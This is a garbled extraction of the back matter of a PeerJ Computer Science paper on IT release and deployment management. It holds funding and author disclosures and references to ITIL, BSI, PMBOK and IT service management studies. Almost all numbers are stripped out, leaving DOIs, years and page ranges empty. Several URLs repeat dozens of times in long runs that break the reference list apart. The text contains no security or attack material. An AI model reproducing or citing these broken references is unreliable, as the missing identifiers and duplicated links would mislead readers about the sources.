disclosures the following grant information was disclosed by the author: department of test and release management of otto (gmbh & co kg). nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. competing interests dr. guido nageldinger is an employee of otto (gmbh & co kg) which is a member of the otto group. author contributions • guido nageldinger conceived and designed the experiments, performed the experi- ments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information. references axelos. . itil r⃝ glossary of terms english v. . ’ published by © axelos limited. available at https://www.axelos.com/corporate/media/files/glossaries/itil glossary gb-v - .pdf (accessed june ). bsi. . bsi-standard - : notfallmanagement (emergency management) version . , german federal office for information security (bundesamt für sicherheit in der informationstechnologie). available at https://www.bsi.bund.de/cae/servlet/contentblob/ / publicationfile/ /standard .pdf (accessed june ). cabinet office. . itil continual service improvement edition (best management practices). the stationery office (july , ), page , page – . jäntti m, virkanen h, mykkänen j, hotti v. . exploring the role of it service management and it service governance within it governance. in: service systems and service management (icssm), th international conference on, ieee conference publications. – doi . /icsssm. . . jokela k, jäntti m. . challenges and problems in product portfolio release and deployment management: a case study. in: service systems and service management (icssm), th international conference on, ieee conference publications. – doi . /icsssm. . . lahtela a, jaentti m. . challenges and problems in release management process: a case study. in: software engineering and servcie science (icsess) ieee, nd international conference on, ieee conference publications. – doi . /icsess. . . larsson f, rusu l, aasi p. . organizational structure in it governance: a case study of an it governance implementation project. in: amcis proceedings / , st americas conference on information systems. puerto rico, available at http://aisel.aisnet.org/amcis / soctech/generalpresentations/ / (accessed september ). marrone m, gacenga f, cater-steel a, kolbe l. . it service management: a cross-national study of itil adoption. in: communications of the association for information systems, vol. . – , article . available at http://aisel.aisnet.org/cgi/viewcontent.cgi?article= & context=cais (accessed september ). nageldinger g. . project-specific cut-over and release-specific rollout: what is the difference and what should we look out for (projekt-spezifischer cut-over und release-spezifischer rollout: was ist der unterschied? worauf müssen wir achten). in: th annual convention on nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.axelos.com/corporate/media/files/glossaries/itil_ _glossary_gb-v - .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf https://www.bsi.bund.de/cae/servlet/contentblob/ /publicationfile/ /standard_ .pdf http://dx.doi.org/ . /icsssm. . http://dx.doi.org/ . /icsssm. . http://dx.doi.org/ . /icsess. . http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/amcis /soctech/generalpresentations/ / http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://aisel.aisnet.org/cgi/viewcontent.cgi?article= &context=cais http://dx.doi.org/ . /peerj-cs. it change and release management (‘ . jahrestagung it change und release management’), a marcus evans event. – . . , berlin, germany. nageldinger g. . it’s missing chapter: interrelations and interdependencies between deployment and project management (itils fehlendes kapitel: die wechselwirkung zwischen dem deployment—und projektmanagement). in: iqnite europe . – . . , düsseldorf, germany; abstract. available at http://www.iqnite-conferences.com/de/programm/abstracts/ nageldinger ab.pdf (accessed ). pmi (project management institute). . a guide to the project management body of knowledge (pmbok r⃝ guide). ed. project management institute, inc., . proehl t, erek k, limbach f, zarnekow r. . topics and applied theories in it service management. in: system sciences (hicss), , th hawaii international conference on, ieee conference publications. – doi . /hicss. . . rance s. . itil service transition edition best management practices. the stationery office, . sap ag. . template management: using templates in global rollout, solution management—application lifecycle management. available at http://www.sdn.sap.com/irj/scn/ go/portal/prtroot/docs/library/uuid/ c bc- bb- c - bb -ed c b b ?quicklink=index& overridelayout=true& (accessed june ). shahsavarani n, ji s. . research in information technology service management (itsm): theoretical foundation and research topic perspectives. in: confirm proceedings, vol. . . shivashankarappa an, dharmalingam r, smalov l, anbazhagan n. . implementing it governance using cobit: a case study focusing on critical success factors’ internet security (worldcis). in: world congress. – available at http://ieeexplore.ieee.org/xpl/ articledetails.jsp?tp=&arnumber= &url=http% a% f% fieeexplore.ieee.org% fxpls% fabs all.jsp% farnumber% d (accessed june ). tanovic a, orucevic f. . integration of prince model into itil v model. in: telecommunications forum (telfor), , th, ieee conference publications. – doi . /telfor. . . nageldinger ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ 